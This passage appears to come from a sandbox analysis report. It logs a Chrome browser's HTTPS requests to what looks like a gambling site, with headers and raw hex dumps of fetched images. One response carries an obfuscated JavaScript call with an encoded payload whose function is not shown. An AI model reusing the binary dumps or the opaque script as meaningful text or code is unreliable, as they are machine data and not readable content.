                                                                                                                                                          2024-06-09 22:41:20 UTC6370INData Raw: 1e ee c1 3d 93 e6 fd 17 f3 5b 4e f2 5e 86 f6 b2 8c c5 47 43 8e 18 b0 aa 07 82 6e 88 2a e0 2c aa 44 07 3e 08 98 8c 75 4f 3c a1 11 8a 23 cf bf a2 37 95 5d 27 c7 49 f2 ef 3b 7f f2 6f c9 e2 73 df d4 2b 4b a5 d3 9b 89 58 3f b6 66 ad 86 d4 fb 21 aa 80 b1 f0 b3 07 56 3d 7f f6 d9 67 dd 20 a5 71 ed 56 f3 28 ac 0a 16 2d 5e c8 fc 95 f3 91 95 08 5b 6b 52 9f 1c 47 67 31 85 62 11 89 af f4 8a 20 40 0a 81 b4 96 40 48 9c f4 15 dd 4c eb ce f1 d1 71 fc 91 1d 4a b5 90 52 b5 4a 57 6f 2f 2a 2a e0 94 24 d7 86 7a bd 49 92 e6 a4 b9 e7 b1 b5 4e 78 42 6a 07 da 79 7c 89 f3 3d 33 38 24 03 43 33 e9 9b 31 c8 e0 cc d9 0c ce 9a cb d2 15 fb 31 77 fe 52 e6 2d 5c ca bc 85 cb 58 b0 78 29 4b 96 2c 71 47 1f 73 cc 78 77 b5 eb e3 59 33 f9 f4 21 47 1d ba d3 e0 70 36 c5 89 22 04 43 10 cc a2 b4 f2
                                                                                                                                                          Data Ascii: =[N^GCn*,D>uO<#7]'I;os+KX?f!V=g qV(-^[kRGg1b @@HLqJRJWo/**$zINxBjy|=38$C311wR-\Xx)K,qGsxwY3!Gp6"C


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          565192.168.2.55034790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC551OUTGET /pc/240516-03/static/js/components/inside.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC642INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1380
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:51 GMT
                                                                                                                                                          ETag: "6645cacb-564"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[2],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE5[304],EU-GER-frankfurt-GLOBAL1-CACHE10[300,TCP_MISS,304],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 0ddbce425fc3be5b3a22b0d94e2a42ce
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823399
                                                                                                                                                          X-CCDN-Expires: 768616
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1380INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 54 67 45 59 42 64 41 47 67 47 38 41 6c 41 4d 57 6f 47 45 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 78 46 4c 51 42 4b 63 67 46 39 53 41 63 30 49 41 50 4e 4d 7a 61 63 65 61 50 67 4e 49 64 68 41 49 68 5a 49 51 41 41 69 51 63 41 54 6c 30 37 71 41 33 41 48 6b 77 41 4b 78 43 63 41 64 41 42 4d 51 54 4c 6d 68 41 41 46 41 79 67 67 67 44 48 41 4a 36 59 61 4b 54 71 41 50 71 68 49 45 67 41 73 69 67 4f 4c 41 41 32 49 4f 6f 55 41 47 35 51 38 53 77 67 44 41 43 45 41 41 77 69 67 71 5a 70 42 6a 70 63 41 4c 77 63 6d 4f 71 35 4d 42 42 4d 36 6f 4b 6b 53 47 58 6b 61 46 41 41 74 6c 6e 71 72 6b 68 63 54 73 6b 51 58 68 42 49 44 4e 6a 71 33 4a 30 47 36 6d 51
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgEYBdAGgG8AlAMWoGEAuAMwFc0YAXAS3UxFLQBKcgF9SAc0IAPNMzaceaPgNIdhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQTLmhAAFAygggDHAJ6YaKTqAPqhIEgAsigOLAA2IOoUAG5Q8SwgDACEAAwigqZpBjpcALwcmOq5MBBM6oKkSGXkaFAAtlnqrkhcTskQXhBIDNjq3J0G6mQ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          566192.168.2.55033654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC639OUTGET /pc/image-pc/video/ag_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC329INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Etag: "5ab34b0d-3af5"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15093
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 14981652056437428874
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15093INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          567192.168.2.55033843.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC370OUTGET /pc/image-pc/video/bbin_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "5ab34b0d-3444"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Content-Length: 13380
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 1123547188645187821
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1139INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:20 UTC4096INData Raw: 00 00 00 00 00 00 00 00 00 04 06 03 05 07 01 02 08 00 01 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 01 02 00 03 04 08 05 06 07 09 10 00 02 01 03 02 03 05 05 04 08 05 04 03 01 00 00 01 02 03 00 11 04 21 05 31 12 06 41 51 61 22 13 71 81 91 14 07 a1 b1 32 23 f0 c1 d1 42 52 62 33 15 e1 72 a2 43 08 82 92 53 24 b2 c2 34 16 11 00 02 01 02 04 02 07 04 05 07 0b 02 07 00 00 00 01 02 00 11 03 21 12 04 05 31 06 41 51 61 71 22 13 07 81 32 42 08 91 a1 52 62 14 f0 b1 72 82 92 b2 73 d1 a2 c2 23 33 43 53 b3 74 15 36 c1 93 f1 d2 e2 63 24 25 35 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 c8 be 9e 7d 35 c6 ca c6 8b 7f ea 28 04 cb 3d 9f 6e db 25 b8 56 5e c9 25 1d a0 f6 2f bc d6 c0 cf 0a 63 35 5c de 92 d8 33 e1 30 cf b1 e0 2c 63 83 47 12 c4 47 b1 90 02 28 19 03 52 20 e4 7d
                                                                                                                                                          Data Ascii: !1AQa"q2#BRb3rCS$4!1AQaq"2BRbrs#3CSt6c$%5?}5(=n%V^%/c5\30,cGG(R }
                                                                                                                                                          2024-06-09 22:41:20 UTC4096INData Raw: 6e ca b3 21 96 48 6f 80 be 9b 87 95 88 37 92 03 db 63 a2 dc 58 5b be 9e 8d 24 6c e9 ae a1 4d af 73 93 37 1b 6f 3e 9c 91 f2 67 a0 b5 88 bd d5 94 fe e9 0d f1 ac 7d 46 9f 3a d0 9e e8 c3 09 4b 9b ba e6 24 b3 a9 8e 25 7c b7 6c 89 dc 58 99 0c a6 e6 e1 6c 2d 7e 1d b5 72 5a 52 3b b0 92 55 e4 e7 4f 91 0a 42 d6 48 62 b9 58 d6 fc 4f 79 37 27 df 5c 2f 35 5b 03 67 d6 9f fd 8b bf b8 d3 ba fa 6d ff 00 29 da bf d6 69 ff 00 ce 49 5c 05 cd ab 48 b6 8d aa fe eb ab b7 a5 d3 8a dc 73 41 d5 da 4f 60 18 9e c9 f5 cf 99 b9 8f 47 cb bb 6d ed c7 5a d9 6c d9 5c cd d6 7a 02 a8 e9 66 62 15 47 59 8e bd 25 b5 6d 99 f9 1c 99 f0 fc c0 37 1c 85 d9 7e 1c a4 56 cf 6d 9e 8f ec da 2b 20 6a 54 df b9 4c 58 b3 2a d7 ee aa 11 87 79 63 db 3e 75 73 67 cd 27 36 6e 5a a6 6d ba e2 e9 2c 57 c2 aa 89 71
                                                                                                                                                          Data Ascii: n!Ho7cX[$lMs7o>g}F:K$%|lXl-~rZR;UOBHbXOy7'\/5[gm)iI\HsAO`GmZl\zfbGY%m7~Vm+ jTLX*yc>usg'6nZm,Wq
                                                                                                                                                          2024-06-09 22:41:20 UTC4049INData Raw: af 7b db 73 64 7d 0c de 94 a0 9f f6 e6 06 26 bf b9 a9 94 e6 14 95 dd 4c 22 26 44 27 1f 27 23 1d b4 68 26 92 33 ff 00 4b 11 5c aa e2 01 95 48 ed 4d 49 27 17 50 75 22 f4 69 0c 2e 0c 1c cc 92 06 36 16 46 41 3c 3d 38 9d be e1 40 b0 1c 4c 95 12 fb 1b a2 fa b3 2e de 86 c1 97 63 c1 a4 41 18 ff 00 59 15 59 bf 6c 71 61 06 75 eb 87 cb d0 5b ce 1a f3 ee b9 7b 66 ce b6 b9 f9 bc c8 c3 7f d8 9c c6 97 f1 28 78 54 fb 20 ce 20 4b 83 b1 e0 17 95 f7 85 de a6 8d 48 8b 17 0e 19 16 12 c4 58 17 9a 40 ba 0e 3a 0a 56 ba 48 a0 14 8c 2a 7a 25 62 c3 c9 0a 86 1d 85 8d 52 4d 4c bc 0c 26 c3 d2 33 09 36 c8 63 bf 9a 2d 08 f0 35 89 74 63 11 85 23 bc 55 51 95 99 69 19 b0 bd 2c 43 2a 3a 8f 70 dc 36 8d a0 ee b1 60 64 3e 3c b2 49 06 2e 50 89 8c 6f 34 42 36 91 11 ad 66 64 12 a1 60 35 01 96 fc
                                                                                                                                                          Data Ascii: {sd}&L"&D''#h&3K\HMI'Pu"i.6FA<=8@L.cAYYlqau[{f(xT KHX@:VH*z%bRML&36c-5tc#UQi,C*:p6`d><I.Po4B6fd`5


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          568192.168.2.55034990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC382OUTGET /pc/image-pc/index/312/new_service_icon.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1243
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:55 GMT
                                                                                                                                                          ETag: "5d71fe87-4db"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE21[3],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465108
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: dda5644681acf84c359dd592a7bd5f49
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126899
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1243INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 18 08 06 00 00 00 9b 53 ff 34 00 00 04 a2 49 44 41 54 48 4b a5 96 5b 6c 14 75 14 c6 bf f3 1f ba 2d 20 52 20 da 02 b3 08 c5 56 45 62 c4 a2 b8 b3 91 97 da 17 6c b5 46 1a 21 31 3b 2d 10 01 e5 12 44 0d 4a a2 1b 31 21 2a 34 80 a8 14 1b bb 53 89 b1 e0 a5 7d 51 13 e3 03 0f 3b 55 a4 46 13 40 6e b2 d8 1d b4 a5 18 58 6a a1 2d 3b ff 63 66 2f 65 17 5a b6 6b e7 71 f6 9c ef fc f6 3b 97 5d 42 96 cf 03 ef fd 36 7e 7c c1 e4 f9 02 74 1f 33 17 32 30 8e 98 2e 13 38 24 a3 f8 a9 6d 85 fb 74 36 92 34 a2 60 bf 5f 3c 5a b4 bc 4a 61 5a c1 84 32 02 b9 86 cb 63 f0 09 96 d4 10 e9 bd b8 e7 d8 8b 73 ff cd a4 9f 11 c0 13 b0 ca 84 a0 5d 00 e6 a4 89 31 5f 62 42 17 80 cb 60 9a 00 f0 6c 22 ca 19 8c 61 74 b3 e4 57 cd 5a 35
                                                                                                                                                          Data Ascii: PNGIHDR S4IDATHK[lu- R VEblF!1;-DJ1!*4S}Q;UF@nXj-;cf/eZkq;]B6~|t320.8$mt64`_<ZJaZ2cs]1_bB`l"atWZ5


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          569192.168.2.55034890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC377OUTGET /pc/image-pc/index/382/top/img_bg2.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 51842
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:18 GMT
                                                                                                                                                          ETag: "64c0a20e-ca82"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[4],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE2[3],EU-FRA-paris-GLOBAL1-CACHE4[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063150
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b48b9c9b77fc33a9a59cef5fe0309069
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528850
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15768INData Raw: ff d8 ff e1 04 61 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0c 00 00 01 03 00 01 00 00 00 7f 07 00 00 01 01 03 00 01 00 00 00 59 00 00 00 02 01 03 00 03 00 00 00 9e 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 a4 00 00 00 1b 01 05 00 01 00 00 00 ac 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 22 00 00 00 b4 00 00 00 32 01 02 00 14 00 00 00 d6 00 00 00 69 87 04 00 01 00 00 00 ec 00 00 00 24 01 00 00 08 00 08 00 08 00 80 fc 0a 00 10 27 00 00 80 fc 0a 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 31 38 3a 30 31 3a 31 32 20 31 38 3a 35 33 3a 32 37 00 00 00 04 00 00 90 07 00 04
                                                                                                                                                          Data Ascii: aExifII*Y(1"2i$''Adobe Photoshop CC 2015 (Windows)2018:01:12 18:53:27
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: f3 35 e1 1e df 0e ea b5 2a 3c 8f 0f 9d 63 bb 69 d3 33 f6 4c 9f 34 13 86 0f b5 2f 0e 24 95 98 20 d9 1f a1 84 ad cd 55 9f 91 76 1d a9 b4 de 67 7f bc 72 99 c6 fe d0 30 fc e9 8a bb d5 5a ca 2f da bd a4 6e 30 55 67 2e 2e 1b 90 7b 17 02 09 75 08 36 af 68 0d f1 b8 45 4a b5 33 0b aa 4d d0 e7 6e 67 19 8e 57 12 42 0b c2 a1 64 00 11 be da 34 de ec ce c3 9d 18 98 6f 69 37 1c 82 e8 06 a9 55 1d 51 27 08 a5 54 d8 8a a4 aa 8f 9d cc ea 17 71 1c db ca 84 54 94 04 da 44 79 a7 93 67 b3 c7 d7 e4 7c 76 af aa 3f 11 c1 8e 73 49 6d e2 11 52 a0 90 9d 11 f1 3c 99 3b ae 92 3f 41 e0 db d9 57 ae 1f a9 e5 e5 f3 ed 66 2b 1c d2 4b 8b 89 42 6a e2 81 c5 37 47 9f 6c 76 ed 47 d0 72 74 69 e4 ce 9d 43 1c 14 c6 69 be 0a ab 82 d5 00 08 78 c4 70 69 25 14 67 c6 9c 5c b6 37 81 e7 33 3a 40 ef de 04
                                                                                                                                                          Data Ascii: 5*<ci3L4/$ Uvgr0Z/n0Ug..{u6hEJ3MngWBd4oi7UQ'TqTDyg|v?sImR<;?AWf+KBj7GlvGrtiCixpi%g\73:@
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 27 3f 89 13 17 a5 bc aa fc 51 d7 62 38 b9 4a 5e e2 6f c7 6c a7 b7 ba be 58 eb 0b 70 95 6a 82 27 e2 43 66 a4 8a 10 77 ca 44 f1 8e 9d 9b 7c 3f f2 52 6e cc 05 3d af 31 f2 98 76 6d f0 ff 00 c8 24 71 9b 78 15 26 d2 89 d1 48 76 6d f0 ff 00 c8 26 ec cd 4d f9 7c d0 02 91 d7 05 6a da c9 01 0e 64 99 5f 12 32 50 65 6a 20 83 b5 6d e6 80 a7 36 e0 a8 e0 3a 08 ea 5a c1 5a b6 b2 40 99 cf 62 1a bc 4b e8 8f f4 63 4a d4 74 44 c0 43 9a 5f 9c 07 08 d7 6a 3d 2c 12 76 61 51 1c 2d 59 c6 3b 56 f8 14 43 98 4a bc 75 98 d2 8a 59 02 6e cc 2a 76 81 af ad 1d 60 93 ad 48 c5 18 d5 37 92 8a 66 be 58 d3 84 4e 73 d0 53 8c cb 5c ae 34 a5 d9 0d d4 89 b6 26 54 9a c8 9f 88 6c d2 c3 3e d6 fa 00 0c 36 c4 8d b7 99 2c 5c 70 11 3b 0a aa 08 27 62 22 c4 ed c2 5e e5 f9 8a 88 33 21 a2 b7 b6 c8 04 8a a3
                                                                                                                                                          Data Ascii: '?Qb8J^olXpj'CfwD|?Rn=1vm$qx&Hvm&M|jd_2Pej m6:ZZ@bKcJtDC_j=,vaQ-Y;VCJuYn*v`H7fXNsS\4&Tl>6,\p;'b"^3!
                                                                                                                                                          2024-06-09 22:41:20 UTC3306INData Raw: 94 5e 12 2b 77 2d 22 71 1c 09 99 bc f4 ed 1a dd ba 29 19 72 4b f6 d0 ae 51 5e d3 2e e5 7f 9c ff 00 98 ef 8a 33 bd 70 33 29 37 ed 55 0b b9 5f e7 3f e6 3b e2 8b b9 74 8a cb a7 f1 c8 61 e1 9b 4c 54 3f ed 1d f1 44 de b8 18 df 3e 94 61 76 11 ec f8 b9 51 0b 82 a6 ca 45 df 1e 94 5d d7 3a 0d 3e 14 a7 6d 83 83 c8 5d e6 51 97 24 f4 1b a7 ac 52 30 0c a8 99 c4 1c 6f 99 79 20 9a 59 a2 ca 6e bf 6c 51 ad 2c 32 6e 68 22 fc db 5b b0 ac 5d cb 81 37 5c e8 19 ce c2 ba 03 5c a6 84 b6 65 42 22 88 7b b2 45 52 97 ee 8d 04 01 85 0a 95 1b 40 a1 94 81 33 8b 08 e3 56 56 e0 f3 c0 e6 2d 57 3c 4c 28 b4 6e 8e a6 d3 4f 20 c3 2b 31 f3 40 58 33 33 7a 0b 89 67 4c 43 98 97 0b ad 02 ec a7 d7 15 3a 19 94 77 0a f6 5c bb 30 54 2c a2 a7 53 9c a3 b4 41 8a 70 e9 f3 b7 a5 3f 96 0d 54 46 5b 43 c4 bf
                                                                                                                                                          Data Ascii: ^+w-"q)rKQ^.3p3)7U_?;taLT?D>avQE]:>m]Q$R0oy YnlQ,2nh"[]7\\eB"{ER@3VV-W<L(nO +1@X33zgLC:w\0T,SAp?TF[C


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          570192.168.2.55033743.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC368OUTGET /pc/image-pc/video/pt_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "5ab34b0d-3501"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Content-Length: 13569
